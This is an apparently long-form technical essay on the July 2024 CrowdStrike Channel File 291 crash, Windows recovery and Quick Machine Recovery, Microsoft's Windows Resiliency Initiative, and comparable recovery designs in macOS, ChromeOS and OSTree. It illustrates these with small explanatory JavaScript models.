At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 containing a Template Instance that referenced the twenty-first field with a non-wildcard matching criterion [@crowdstrike-rca-pdf, @crowdstrike-tech-details]. The Content Interpreter loaded the instance, looked up the twenty-first input pointer in its input-pointer array, and read past the end of that array. Sensors running 7.11 or later that received the update between 04:09 and 05:27 UTC tripped the latent out-of-bounds read [@crowdstrike-tech-details].
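The latency of the bug is easier to see in a toy model. The sketch below is not CrowdStrike's code: `evaluate` is a hypothetical stand-in for the interpreter's match loop, the input values are made up, and JavaScript cannot actually fault on an out-of-range index, so the model reports the fault as a string instead. The `boundsCheck` option shows the kind of guard that turns the read into a clean non-match.

```javascript
const DECLARED_FIELDS = 21; // the Template Type declares 21 fields
const SUPPLIED_INPUTS = 20; // the integration code supplies 20 inputs
const WILDCARD = '*';

// Hypothetical model of a match loop: a wildcard criterion never reads its input.
function evaluate(criteria, inputs, options) {
  for (let i = 0; i < criteria.length; i++) {
    if (criteria[i] === WILDCARD) {
      continue; // input i is never touched
    }
    if (i >= inputs.length) {
      if (options.boundsCheck) {
        return { matched: false, fault: null };
      }
      // In a kernel driver this would be a read past the end of the array.
      return { matched: false, fault: 'out-of-bounds read at input index ' + i };
    }
    if (inputs[i] !== criteria[i]) {
      return { matched: false, fault: null };
    }
  }
  return { matched: true, fault: null };
}

const inputs = Array.from({ length: SUPPLIED_INPUTS }, (_, i) => 'v' + i);

// Instances shipped before July 19: field 21 is a wildcard, so the mismatch stays latent.
const latentInstance = new Array(DECLARED_FIELDS).fill(WILDCARD);

// The July 19 instance: a non-wildcard criterion on field 21 (index 20).
const triggeringInstance = latentInstance.slice();
triggeringInstance[20] = 'some-value';

console.log(evaluate(latentInstance, inputs, { boundsCheck: false }));
console.log(evaluate(triggeringInstance, inputs, { boundsCheck: false }));
console.log(evaluate(triggeringInstance, inputs, { boundsCheck: true }));
```

The same interpreter and the same twenty inputs produce no fault for months and then fault on the first instance whose twenty-first criterion is not a wildcard.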

The crash

Microsoft's Windows Error Reporting analysis, published in the security blog on July 27, 2024, recorded the global crash signature as nt!KeBugCheckEx followed by nt!KiPageFault and then csagent+0xe14ed, with r8=ffff840500000074 as the invalid pointer that the read tried to dereference [@ms-security-jul27]. Microsoft confirmed that the analysis matched CrowdStrike's own conclusion: a read-out-of-bounds memory safety error in the csagent.sys driver.

flowchart TD
    A[Falcon 7.11 ships in Feb 2024 with IPC Template Type declaring 21 fields] --> B[Integration code supplies only 20 inputs]
    B --> C[Latent OOB potential -- no instance references field 21]
    C --> D[July 19 04:09 UTC: new Channel File 291 adds non-wildcard 21st-field criterion]
    D --> E[Content Interpreter reads input-pointer index 20]
    E --> F[Page fault at csagent+0xe14ed]
    F --> G[nt!KiPageFault -> nt!KeBugCheckEx]
    G --> H[Bug check; system reboots]
    H --> I[csagent.sys reloads -- registered SERVICE_SYSTEM_START Start=1 -- bug check again]
    I --> J[Boot loop on 8.5 million endpoints]

The kernel-resident dependency

csagent.sys loaded early in boot. Microsoft's WER post-mortem shows the driver registered with REG_DWORD Start 1 -- the SERVICE_SYSTEM_START class, loaded by the kernel before user-mode comes up [@ms-security-jul27]. That placement is the entire point of a kernel-mode security agent: it has to instrument the kernel boundary at the moment user-mode would otherwise be invisible to it. The cost of that placement is that when an early-boot driver page-faults, the bug check happens before the operating system is interactive. The remediation -- delete C-00000291*.sys -- could not be issued from a running Windows, because there was no running Windows.
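The Start value is one of five documented service start types. A small lookup makes the placement concrete; `describeStart` is a hypothetical helper, and the `loadedDuringKernelInit` flag is this sketch's shorthand for "boot-start or system-start", not a Windows field.

```javascript
// Documented values of the Start registry entry for a driver or service.
const START_TYPES = {
  0: 'SERVICE_BOOT_START',
  1: 'SERVICE_SYSTEM_START',
  2: 'SERVICE_AUTO_START',
  3: 'SERVICE_DEMAND_START',
  4: 'SERVICE_DISABLED',
};

// Hypothetical helper: name the start type and flag the two early-boot classes.
function describeStart(value) {
  const name = START_TYPES[value];
  if (name === undefined) {
    throw new RangeError('unknown Start value: ' + value);
  }
  return { name, loadedDuringKernelInit: value <= 1 };
}

console.log(describeStart(1)); // the value the WER post-mortem reports for csagent.sys
console.log(describeStart(3));
```

A fault in anything flagged `loadedDuringKernelInit` happens before there is an interactive session from which to remove the offending file.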

The fault dynamic above is easier to describe than it is to file. CrowdStrike's own technical-details post is explicit about the file-type distinction: "Although Channel Files end with the SYS extension, they are not kernel drivers" [@crowdstrike-tech-details]. The kernel-mode component is `csagent.sys`. The Channel Files in `C:\Windows\System32\drivers\CrowdStrike\` are *data* that the Content Interpreter inside `csagent.sys` reads. The fault was a bug in `csagent.sys`'s interpretation of a particular Channel File; both ends matter, and the file extension on the data file is incidental.

The recovery procedure

Microsoft published KB5042421 within hours [@ms-kb5042421]. The text reduced to three steps: boot to Safe Mode (which on Windows 11 means letting WinRE select Safe Mode from the Advanced startup options tree); delete C:\Windows\System32\drivers\CrowdStrike\C-00000291*.sys; reboot. For BitLocker-encrypted volumes the procedure had a fourth, preliminary step: surface the recovery key. KB5042421 walks the user through the Entra ID self-service flow at aka.ms/aadrecoverykey: log on from a phone, choose Manage Devices, View BitLocker Keys, Show recovery key [@ms-kb5042421].

The instruction was correct. It was also unambiguously per-machine.
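The wildcard in the delete step matters because it must catch every version of Channel File 291 and nothing else in the folder. The sketch below expresses that pattern as a filter over a directory listing. The file names in `listing` are invented for illustration, `matchesChannelFile291` is a hypothetical helper, and nothing here touches a disk.

```javascript
// Hypothetical helper: does this file name match C-00000291*.sys?
function matchesChannelFile291(fileName) {
  return /^C-00000291.*\.sys$/i.test(fileName);
}

// Invented listing of the CrowdStrike drivers folder, for illustration only.
const listing = [
  'C-00000291-00000000-00000032.sys',
  'C-00000285-00000000-00000001.sys',
  'csagent.sys',
];

const toDelete = listing.filter(matchesChannelFile291);
console.log(toDelete);
```

Only the Channel File 291 entry is selected; other channel files and the driver itself are left alone.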

We currently estimate that CrowdStrike's update affected 8.5 million Windows devices, or less than one percent of all Windows machines. -- Microsoft, *Helping our customers through the CrowdStrike outage*, July 20, 2024 [@ms-crowdstrike-jul20].

The bottleneck

Each device's recovery was a function of time-to-physical-access, plus time-to-BitLocker-key, plus time-to-keyboard. None of those terms scaled. A laptop on a desk that the owner happened to be near recovered in five minutes. A laptop on a desk where the owner was on holiday recovered when someone arrived to swipe their badge. A server in a remote data centre recovered when a hand reached the iLO or KVM. A point-of-sale device in a checked-bag-only baggage hall recovered when someone wheeled a USB keyboard out to it. Multiply by 8.5 million.

The architecture that delivered Safe Mode to every one of those devices did exactly what its 2009 specification said it would do. The architecture that delivered Safe Mode to every one of those devices left enterprises stranded for days. Both sentences are true. The contradiction is the whole point.

Note: WinRE booted correctly. The Safe Mode tile rendered. The two-failed-boots trigger fired. The recovery partition was where it should be. The BCD recoverysequence led to the right winre.wim. The keyboard handler took keystrokes. Every line of code did what it was specified to do. The single unwritten line of the specification -- one operator, please -- was the line that did not scale.

The instruction was correct, the procedure was published within hours, and the floor was on fire for days. The next question -- the one Microsoft was already being asked at WESES, the closed-door September 10, 2024 endpoint-security partner summit [@ms-weses] -- was whether the floor could be kept from catching fire next time.

6. The Breakthrough: Quick Machine Recovery

Quick Machine Recovery, announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024] and generally available on Windows 11 24H2 build 26100.4700+ in August 2025 per the November 18, 2025 update [@ms-wri-ignite-2025], did not add any new technology to WinRE that had not been in WinPE since 2002. Networking drivers, DHCP clients, HTTPS stacks: all of these were already in winre.wim's base image, inherited from the WinPE Optional Components that have shipped with the OS for two decades [@ms-winpe-intro]. What QMR added was an answer to a question WinRE had never been asked: when you are inside the recovery environment with no operator at the keyboard, who do you call?

Quick Machine Recovery (QMR): the Windows 11 24H2 feature, available on build 26100.4700 or later, that lets WinRE establish network connectivity from inside the recovery environment, query Windows Update for a remediation matching the current failure signature, download and apply that remediation, and reboot -- all without requiring an operator at the keyboard [@ms-qmr]. Announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024]; first shipped in Windows 11 Insider Preview build 26120.3653 on March 28, 2025 [@ms-qmr-insider-mar2025]; generally available in August 2025 [@ms-wri-ignite-2025].

The five-phase loop

Microsoft Learn documents QMR as five phases [@ms-qmr]:

Crash detection. The same two-failed-boots trigger already in the Windows RE Technical Reference [@ms-winre-tech-ref] fires the recovery path.
Boot to recovery. The existing BCD recoverysequence mechanism from Section 3 routes the system into WinRE.
Network connection. WinRE establishes wired Ethernet, or WPA/WPA2 password-based Wi-Fi using a credential pre-staged via reagentc.exe /SetRecoverySettings. As of the Microsoft Learn page's current wording, only wired and WPA/WPA2 password-based wireless are supported [@ms-qmr]; enterprise certificates and WPA3-Enterprise are on the November 18, 2025 roadmap but not yet shipped [@ms-wri-ignite-2025].
Remediation. The recovery environment scans Windows Update for a published remediation matching the device's failure signature, downloads it, and applies it.
Reboot. On success, the device boots normally. On no-match, the device can either present the manual recovery menu (the one-time scan mode, the default for unmanaged systems) or loop with a configurable interval (the looped mode) until either a remediation arrives or the operator-set total wait time expires [@ms-qmr].

sequenceDiagram
    participant D as Device (OS)
    participant W as WinRE
    participant N as Network
    participant WU as Windows Update
    participant O as OS partition
    D->>W: Two failed boots -> follow recoverysequence
    W->>N: Acquire Ethernet or WPA2 Wi-Fi
    W->>WU: Query for remediation matching failure signature
    WU-->>W: Remediation package (or "none found")
    alt Remediation available
        W->>O: Apply remediation to OS partition
        W->>D: Reboot
        D-->>D: Normal boot succeeds
    else None found, one-time mode
        W->>D: Present manual recovery menu
    else None found, looped mode
        W-->>W: Sleep wait_interval, retry until total_wait_time
    end

The default-on/off matrix

The Microsoft Learn QMR page is explicit on defaults [@ms-qmr]. Cloud remediation is enabled by default, with one-time scan auto-remediation, on systems that are not under enterprise management -- Windows Home and unmanaged Pro. It is disabled by default on enterprise-managed systems -- Windows Enterprise, Education, and managed Pro. The rationale follows from how those populations think: enterprise administrators want to gate cloud remediation behind their own deployment-ring process, and consumers benefit from the default-on behaviour because they do not have a ring process at all. The same Microsoft Learn page documents an Intune Settings Catalog policy under Remote Remediation > Enable Cloud Remediation for administrators who want to switch the policy on at the tenant level [@ms-qmr].
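The matrix reduces to a two-input function. The sketch below encodes only what the paragraph above states; `cloudRemediationDefault` and its edition strings are hypothetical names, and an administrator's policy would override whatever it returns.

```javascript
// Hypothetical helper: default state of cloud remediation as described above.
// edition: 'Home' | 'Pro' | 'Enterprise' | 'Education'; managed: boolean.
function cloudRemediationDefault(edition, managed) {
  switch (edition) {
    case 'Home':
      return true; // not under enterprise management
    case 'Pro':
      return !managed; // on when unmanaged, off when managed
    case 'Enterprise':
    case 'Education':
      return false; // off until an administrator enables it
    default:
      throw new Error('unknown edition: ' + edition);
  }
}

console.log(cloudRemediationDefault('Home', false));
console.log(cloudRemediationDefault('Pro', true));
console.log(cloudRemediationDefault('Enterprise', true));
```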

The test-mode flow

QMR ships with a dry-run mechanism. reagentc.exe /SetRecoveryTestmode configures the WinRE entry for a simulated recovery cycle; reagentc.exe /BootToRe triggers the cycle on the next reboot; the simulated remediation appears in Settings > Windows Update > Update history rather than mutating the production OS [@ms-qmr]. Microsoft suggests using the test mode to validate the per-device QMR configuration before relying on it in production.

The pseudocode

The five phases collapse into a short loop. The version below is paraphrased from the Microsoft Learn QMR page [@ms-qmr] and shows how the two settings interact.

{`
// Paraphrased from the Microsoft Learn QMR specification.

const config = {
  cloud_remediation_enabled: true, // default on Home/unmanaged Pro
  auto_remediation_mode: 'looped', // 'one_time' | 'looped'
  total_wait_time_minutes: 60,
  wait_interval_minutes: 10,
  wifi: { ssid: 'corp-recovery', psk: '***', encryption: 'WPA2' },
};

// Stand-in for the failure signature WinRE would derive from the crash.
function detectFailureSignature() {
  return { driver: 'csagent.sys', offset: '0xe14ed', signature: 'oob-read' };
}

// Stand-in for the Windows Update query; returns a remediation or null.
function scanWindowsUpdate(signature) {
  if (signature.driver === 'csagent.sys' && signature.signature === 'oob-read') {
    return {
      id: 'qmr-csagent-291',
      action: 'delete',
      path: 'C:\\Windows\\System32\\drivers\\CrowdStrike\\C-00000291*.sys',
    };
  }
  return null;
}

function qmrEnterRecovery() {
  console.log('Phase 1: crash detected (two failed boots)');
  console.log('Phase 2: booted into WinRE via BCD recoverysequence');

  if (!config.cloud_remediation_enabled) {
    console.log('Cloud remediation disabled; falling back to Startup Repair');
    return;
  }

  console.log('Phase 3: acquiring network (' + config.wifi.encryption + ' Wi-Fi)');
  const sig = detectFailureSignature();
  let elapsed = 0;

  while (true) {
    console.log('Phase 4: scanning Windows Update for remediation matching ' + sig.driver);
    const remediation = scanWindowsUpdate(sig);
    if (remediation) {
      console.log(' -> Applying ' + remediation.id + ' (delete ' + remediation.path + ')');
      console.log('Phase 5: reboot into repaired Windows');
      return;
    }
    if (config.auto_remediation_mode === 'one_time') {
      console.log('No remediation found; presenting manual recovery menu');
      return;
    }
    elapsed += config.wait_interval_minutes;
    if (elapsed >= config.total_wait_time_minutes) {
      console.log('Looped mode exhausted; falling back to manual recovery menu');
      return;
    }
    console.log(' -> No match; sleeping ' + config.wait_interval_minutes + ' min');
  }
}

qmrEnterRecovery();
`}

The counterfactual

Had QMR existed on July 19, 2024, the per-device labour would have been zero. Microsoft and CrowdStrike would have published a Windows Update remediation that deletes C-00000291*.sys; every affected device would have entered WinRE on its second failed boot, picked up the remediation, applied it, and rebooted. The 8.5-million-device fleet cost would have collapsed from operator-days to network-minutes. The CrowdStrike RCA published August 6, 2024 documents that the fault-to-rollback time was 78 minutes [@crowdstrike-tech-details, @crowdstrike-rca-pdf]; QMR would have made time-to-rollback and time-to-fleet-recovery the same number, plus the per-device Windows Update transit. That is the empirical case Microsoft is making.
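The 78-minute figure follows directly from the two timestamps in Section 5, and the contrast with manual recovery can be put in rough numbers. In the sketch below the timestamps come from the text; the fleet size, minutes per device, and operator count passed to `manualFleetHours` are invented inputs for illustration, and both function names are hypothetical.

```javascript
// Minutes between two ISO 8601 timestamps.
function minutesBetween(startIso, endIso) {
  return (Date.parse(endIso) - Date.parse(startIso)) / 60000;
}

// Timestamps from the text: update pushed 04:09 UTC, exposure window closed 05:27 UTC.
const rollbackMinutes = minutesBetween('2024-07-19T04:09:00Z', '2024-07-19T05:27:00Z');

// Hypothetical model: wall-clock hours for operators to touch every device by hand.
function manualFleetHours(devices, minutesPerDevice, operators) {
  return (devices * minutesPerDevice) / operators / 60;
}

console.log('Fault-to-rollback: ' + rollbackMinutes + ' minutes');
// Invented example inputs: 1,000 devices, 15 minutes each, 10 operators.
console.log('Manual recovery: ' + manualFleetHours(1000, 15, 10) + ' hours');
```

The manual term grows with the device count and shrinks only by adding people; the rollback term does not depend on the fleet size at all, which is the gap the counterfactual describes.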

Key idea: Quick Machine Recovery did not add new technology to WinRE. It added a question. WinRE has always had networking drivers; it had never been told it had permission to phone home. The technical innovation is policy, not code -- the Windows Update endpoint framing is a commitment that the recovery environment may, in well-defined circumstances, act on behalf of the operator who is not there.

QMR re-priced the operator labour of a fleet recovery from O(N) in the number of devices to roughly O(1). But QMR alone does not explain why Microsoft is calling this the Windows Resiliency Initiative rather than the Quick Machine Recovery Release. The next section unpacks the five layers WRI puts around QMR.

7. The Program: The Windows Resiliency Initiative as Five Layers

WRI is not one feature. It is a layered program. Each layer is a Microsoft-named deliverable with a Microsoft-cited source. The temptation, on reading any single WRI blog post, is to confuse the layer with the program. The layers are concentric. They are also dated.

Walk the five layers. Each has a Microsoft term, a primary anchor, and a published status as of November 18, 2025.

Layer	Microsoft term	Anchor	Status as of Nov 18, 2025
Prevent: stop bad updates leaving the partner	Safe Deployment Practices (SDP), part of MVI 3.0	[@ms-wri-ignite-2024], [@ms-mvi], [@ms-wri-jun-2025]	Effective April 1, 2025 [@ms-wri-ignite-2025]
Prevent: stop bad code being kernel-resident	Windows endpoint security platform (user-mode antivirus)	[@ms-wri-ignite-2024], [@ms-wri-jun-2025], [@ms-wri-ignite-2025]	Private preview July 2025; named partners in [@ms-wri-jun-2025]
Manage: see the incident at scale	Intune surfaces WinRE state; Mission Critical Services for Windows	[@ms-wri-ignite-2025]	Coming soon
Recover: heal the unbootable machine	Quick Machine Recovery	[@ms-wri-ignite-2024], [@ms-qmr], [@ms-wri-ignite-2025]	GA August 2025
Recover: rebuild without shipping hardware	Point-in-Time Restore, Cloud Rebuild, Windows 365 Reserve	[@ms-wri-ignite-2025]	PITR Insider preview Nov 2025; W365R GA; Cloud Rebuild coming

flowchart LR
    subgraph L1[1. Prevent: stop bad updates at the partner -- MVI 3.0 SDP]
        subgraph L2[2. Prevent: stop bad code being kernel-resident -- user-mode AV platform]
            subgraph L3[3. Manage: see the incident at scale -- Intune surfaces WinRE state]
                subgraph L4[4. Recover the unbootable: Quick Machine Recovery]
                    subgraph L5[5. Rebuild without shipping hardware: PITR / Cloud Rebuild / W365 Reserve]
                        CORE[Windows endpoint -- recoverable at fleet scale]
                    end
                end
            end
        end
    end

Layer 1: Safe Deployment Practices and MVI 3.0

Microsoft Virus Initiative 3.0 became effective on April 1, 2025 [@ms-wri-ignite-2025]. Membership now requires partners to commit to four named obligations [@ms-mvi]: a signed nondisclosure agreement; use of Microsoft Trusted Signing (the hosted descendant of Authenticode) for AV/EDR driver code-signing; documented Safe Deployment Practices for content updates (gradual rollouts with deployment rings and monitoring); and certification within the last 12 months by at least one of AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, or West Coast Labs [@ms-mvi]. The June 26, 2025 WRI update lists eight named partner endorsements -- Bitdefender (Florin Virlan), CrowdStrike (Alex Ionescu), ESET (Juraj Malcho), SentinelOne (Stefan Krantz), Sophos (John Peterson), Trellix (Jim Treinen), Trend Micro (Rachel Jin), and WithSecure (Johannes Rave) -- and the November 18, 2025 update confirms the effective date verbatim: "Effective April 1, 2025, Version 3.0 of the Microsoft Virus Initiative added new requirements for all Windows antivirus (AV) partners to maintain signing rights for Windows AV drivers" [@ms-wri-jun-2025, @ms-wri-ignite-2025].

Microsoft Virus Initiative (MVI): Microsoft's program for third-party antivirus and endpoint detection vendors that ship products on Windows. MVI 3.0, effective April 1, 2025, adds Safe Deployment Practices, mandatory Trusted Signing, NDA, and 12-month independent test-lab certification as preconditions to maintain Windows AV driver signing rights [@ms-mvi, @ms-wri-ignite-2025].

The model is structurally identical to the canary / progressive-rollout pattern formalised in the Google SRE Book chapter on Release Engineering: hermetic builds, multiple deployment rings, gated promotion between rings, "Push on Green", and the option to cherry-pick at the same revision when a critical change is needed mid-cycle [@sre-release-eng]. MVI 3.0 is not a Microsoft invention; it is a Microsoft mandate of a model that has been industry practice for two decades. The mandate is what is new.
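Gated promotion between rings is simple to state in code. The sketch below is a generic illustration of the pattern, not Microsoft's or any vendor's pipeline: the ring names, device counts, failure counts, and the 1% threshold are all invented, and `rollOut` is a hypothetical function.

```javascript
// Hypothetical gate: release to each ring in order and stop at the first ring
// whose observed failure rate exceeds the threshold.
function rollOut(rings, maxFailureRate) {
  const passed = [];
  for (const ring of rings) {
    const failureRate = ring.failures / ring.devices;
    if (failureRate > maxFailureRate) {
      return { passed, haltedAt: ring.name }; // later rings never receive the update
    }
    passed.push(ring.name);
  }
  return { passed, haltedAt: null };
}

// Invented telemetry for three rings.
const rings = [
  { name: 'canary', devices: 100, failures: 0 },
  { name: 'early', devices: 1000, failures: 50 },
  { name: 'broad', devices: 100000, failures: 0 },
];

console.log(rollOut(rings, 0.01));
```

With these inputs the rollout halts at the second ring, so the damage is bounded by that ring's size rather than by the whole fleet.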

Layer 2: The Windows endpoint security platform

The same November 19, 2024 keynote committed to a Windows endpoint security platform that lets partners ship their detection logic outside kernel mode, with a private preview promised to security-partner programs by July 2025 [@ms-wri-ignite-2024]. The June 26, 2025 update confirmed the date with named partner endorsements [@ms-wri-jun-2025]. The architectural premise is the one BSOD survivors recognise immediately: a faulty user-mode component can be killed by Task Manager; a faulty kernel-mode driver bug-checks the system.

Graphics drivers, for example, will continue to run in kernel mode for performance reasons. -- Microsoft, *Preparing for what's next*, November 18, 2025 [@ms-wri-ignite-2025].

Microsoft is careful to frame WRI as a floor-raiser, not a kernel ban. The November 18, 2025 update enumerates the driver-resiliency playbook for the surfaces that will remain in kernel mode: mandatory compiler safeguards (control-flow integrity, CFG, stack canaries), driver isolation, DMA-remapping, a higher signing bar, and expanded in-box Microsoft drivers and APIs that third parties can call rather than reimplementing [@ms-wri-ignite-2025]. The argument is that the kernel surface that must exist (graphics, storage, some networking) should be smaller, better isolated, and equipped with mitigations that contain a single fault.

The June 2025 partner roster is the most pointed piece of evidence that the user-mode direction predates and outlasts the July 2024 incident. CrowdStrike itself is named [@ms-wri-jun-2025]. The vendor that started the chain reaction is publicly endorsing the architectural concession the chain reaction priced into existence.

The Windows Resiliency Initiative is not Microsoft's only post-2023 security program. The umbrella is the *Secure Future Initiative* (SFI), announced in November 2023 as the company-wide response to identity-based attacks on Microsoft itself. WRI is the workstream inside SFI that owns Windows availability, kernel resilience, and the recovery path; SFI also owns identity hardening, supply-chain controls, and engineering culture changes. Microsoft's published WRI blogs frame the recoverability program as "the Windows pillar of our Secure Future Initiative", not as a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025].

Layer 3: Intune-surfaced WinRE state

The November 18, 2025 update names a new Intune signal: "Intune will surface when a Windows device has booted into the Windows Recovery Environment (WinRE)" [@ms-wri-ignite-2025]. The same signal will appear in the Azure Portal for Windows Server VMs that switched into WinRE. The same update introduces a WinRE plug-in model: IT administrators can push custom recovery scripts through Intune, with the model documented as third-party-MDM-adoptable. Both are "coming soon" as of that announcement [@ms-wri-ignite-2025].

The architectural insight here is that Microsoft-pushed remediations (QMR) and administrator-pushed remediations (Intune scripts) must be expressible against the same WinRE surface, with Intune providing the visibility and audit layer.

Layer 4: Quick Machine Recovery

Already covered in Section 6. Status: GA August 2025 on Windows 11 24H2 build 26100.4700+ [@ms-qmr, @ms-wri-ignite-2025]. Autopatch QMR management was in preview as of the November 2025 announcement [@ms-wri-ignite-2025].

Layer 5: Rebuild without shipping hardware

The November 18, 2025 update introduces three Microsoft-cloud-side recovery actions [@ms-wri-ignite-2025]:

Point-in-Time Restore (PITR). Cloud-orchestrated rollback to an earlier point-in-time snapshot of the device's full state. Status: available in the Windows Insider preview build the week of the announcement.
Cloud Rebuild. Intune-portal-triggered clean OS reimage using Autopilot for zero-touch provisioning, with user data and settings restored from OneDrive and Windows Backup for Organizations. Status: coming.
Windows 365 Reserve. A temporary Cloud PC for users whose endpoint is unusable. Status: generally available.

Each of these targets a scenario QMR cannot fix. PITR addresses regressions that the user-mode WU pipeline cannot patch back -- driver downgrades that need to roll back state, not push a new patch. Cloud Rebuild addresses devices whose local Windows is genuinely beyond surgical repair. Windows 365 Reserve addresses the productivity gap while the local device is being recovered.

All five layers are anchored on Microsoft blogs and Microsoft Learn pages. None of them is unique to Microsoft. Apple, ChromeOS, and the Linux atomic distributions have each chosen a different layered architecture for the same problem. What does the field actually look like?

8. Competing Models: Apple, ChromeOS, and the Linux Atomic Distributions

Microsoft is not the first vendor to treat recovery as part of its security architecture. It is, at consumer scale, among the last. Apple, Google, and the Linux atomic-distribution community each picked a different layer to anchor on.

Apple macOS: Signed System Volume + paired/fallback recoveryOS + 1TR

macOS 10.15 (Catalina, 2019) introduced the read-only system volume. macOS 11 (Big Sur, 2020) added the Signed System Volume on top of it: a SHA-256 Merkle tree over every block of the system volume, sealed by Apple at install or update time [@apple-ssv]. On Apple Silicon, the bootloader verifies the seal before transferring control to the kernel; on Intel-based Macs with the T2 Security Chip, the bootloader forwards the measurement and signature to the kernel, which verifies the seal directly before mounting the root file system [@apple-ssv]. On verification failure, the Mac drops into recoveryOS automatically and prompts the user to reinstall.
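The seal-and-verify idea can be sketched in a few lines. This is a minimal illustration of a SHA-256 Merkle root over a list of blocks, not Apple's on-disk format: the block contents, the rule for promoting an unpaired node, and the names `merkleRoot` and `verifySeal` are all assumptions made for the example.

```javascript
const { createHash } = require('node:crypto');

const sha256 = (buf) => createHash('sha256').update(buf).digest();

// Hash every block, then hash pairs of hashes upward until one root remains.
// Assumption for this sketch: an unpaired node at the end of a level is promoted as-is.
function merkleRoot(blocks) {
  if (blocks.length === 0) throw new Error('need at least one block');
  let level = blocks.map((b) => sha256(b));
  while (level.length > 1) {
    const next = [];
    for (let i = 0; i < level.length; i += 2) {
      next.push(i + 1 < level.length
        ? sha256(Buffer.concat([level[i], level[i + 1]]))
        : level[i]);
    }
    level = next;
  }
  return level[0].toString('hex');
}

// The "seal" is the root recorded at install time; verification recomputes and compares.
function verifySeal(blocks, sealedRoot) {
  return merkleRoot(blocks) === sealedRoot;
}

// Made-up stand-ins for system-volume blocks.
const volume = ['kernel', 'libsystem', 'launchd'].map((s) => Buffer.from(s));
const seal = merkleRoot(volume);

const tampered = volume.slice();
tampered[1] = Buffer.from('libsystem-modified');

console.log(verifySeal(volume, seal));   // untouched volume
console.log(verifySeal(tampered, seal)); // one changed block changes the root
```

Because every leaf feeds the root, a change to any single block is enough to make the recomputed root disagree with the seal.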

The recovery side has three flavours [@apple-boot]: a paired recoveryOS that exactly matches the installed system version; on Apple Silicon, a fallback recoveryOS (the previous OS version); and a hardware-anchored 1TR ("one true recovery") environment that survives even when the paired recoveryOS is broken. The 1TR environment is anchored in the Secure Enclave, which is the macOS analogue of Windows's signed bootmgfw.efi on the EFI System Partition.

What Apple excels at is tampered system files and failed updates: the first block read fails Merkle verification; the snapshot pointer flips to the prior good snapshot; the user reboots into a working system. What Apple does not have is an analogue of QMR's targeted remediation pipeline. The macOS answer to a faulty signed third-party security agent is "reinstall macOS". That is wipe-and-reload, not surgical repair.

ChromeOS: Verified Boot + A/B root partitions + auto-rollback

ChromeOS's verified-boot design has been the same since 2010 [@chromium-verified-boot]. A read-only boot stub, anchored in write-protected EEPROM, computes a cryptographic hash of the read-write firmware (SHA-1 in the original 2010 specification; SHA-256 in current production firmware) and verifies an RSA signature (at least 2048 bits) against a permanently stored public key [@chromium-verified-boot]. The verified read-write firmware then hashes the kernel and verifies its signed hashes. A transparent block device in the kernel verifies each block against a stored hash tree on every read, with the tree's root signed by the firmware.

The recovery story is the brilliant part. ChromeOS devices have two root partitions, ROOT-A and ROOT-B, plus a separate stateful partition for user data [@chromium-autoupdate]. Each root partition carries a remaining_attempts counter (default 6) stored in unused GPT bits next to the bootable flag. Once a partition exhausts that counter through consecutive failed boots, the boot loader falls back to the other partition. Auto-updates always write to the partition not currently in use, never the booted one. The result is that ChromeOS recovers from a faulty signed system update in one reboot per device, automatically, without an operator action. This is the empirical upper bound on automation: no fielded platform recovers a signed-but-faulty boot path faster than one reboot.
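The fallback rule is easier to see as a small state machine. The sketch below is a simplified model, not the ChromeOS boot loader: the `successful` flag, the decrement-before-each-try rule, and the function names are assumptions for illustration, and only the counter default of 6 comes from the text above.

```javascript
// Simplified model of A/B slot selection. Field names and the
// "decrement before each try" rule are assumptions for illustration only.
function makeSlot(name, healthy) {
  return { name, healthy, remainingAttempts: 6, successful: false };
}

// Pick the first slot that is known-good or still has attempts left.
function selectSlot(slots) {
  return slots.find((s) => s.successful || s.remainingAttempts > 0) ?? null;
}

// Run boot cycles until some slot boots or nothing is left to try.
function bootUntilStable(slots) {
  let attemptsUsed = 0;
  for (;;) {
    const slot = selectSlot(slots);
    if (!slot) return { booted: null, attemptsUsed }; // below the trust floor
    attemptsUsed += 1;
    if (!slot.successful) slot.remainingAttempts -= 1;
    if (slot.healthy) {
      slot.successful = true; // a good boot marks the slot as known-good
      return { booted: slot.name, attemptsUsed };
    }
  }
}

// A faulty update was just written to ROOT-B and given priority;
// ROOT-A is the previous, known-good image.
const rootB = makeSlot('ROOT-B', false);
const rootA = makeSlot('ROOT-A', true);
rootA.successful = true;

console.log(bootUntilStable([rootB, rootA]));
```

In this model the faulty slot is retried until its counter runs out, after which the loader selects ROOT-A with no operator input. If both slots are unhealthy the function returns `booted: null`, which corresponds to the case where external recovery media is needed.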

Linux atomic distributions: OSTree, rpm-ostree, bootc

OSTree, the upstream of Fedora's atomic desktops and CoreOS, is "Git for operating system binaries" [@fedora-silverblue]. It stores content-addressed objects under /ostree/repo, builds each deployment as a hardlink farm under /ostree/deploy/$stateroot/deploy/, describes it in a boot entry at /boot/loader/entries/ostree-$stateroot-$checksum.$serial.conf, performs a three-way merge of /etc between the booted deployment and the new one, and atomically swaps the boot directory by flipping a symlink between /ostree/boot.0 and /ostree/boot.1 [@ostree-atomic]. The crash-safe guarantee is verbatim: "if the system crashes or you pull the power, you will have either the old system, or the new one" [@ostree-atomic].
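The symlink flip is the part that delivers the "old system or new one" guarantee. A minimal sketch of the general technique on a POSIX filesystem follows; it runs in a scratch directory, the `boot` link name and the helper `atomicSwapSymlink` are hypothetical, and it is not OSTree's own code.

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// Atomically repoint `linkPath` at `target`: create a temporary symlink next to it,
// then rename() it over the old one. POSIX rename replaces the destination in one
// step, so a reader sees either the old target or the new one, never a missing link.
function atomicSwapSymlink(linkPath, target) {
  const tmp = `${linkPath}.tmp-${process.pid}`;
  fs.rmSync(tmp, { force: true }); // clear a leftover from an interrupted run
  fs.symlinkSync(target, tmp);
  fs.renameSync(tmp, linkPath);
}

// Hypothetical layout in a scratch directory; real OSTree paths differ.
const root = fs.mkdtempSync(path.join(os.tmpdir(), 'swap-demo-'));
fs.mkdirSync(path.join(root, 'boot.0'));
fs.mkdirSync(path.join(root, 'boot.1'));
const link = path.join(root, 'boot');

atomicSwapSymlink(link, 'boot.0'); // current deployment
atomicSwapSymlink(link, 'boot.1'); // new deployment goes live in one rename
console.log(fs.readlinkSync(link));
```

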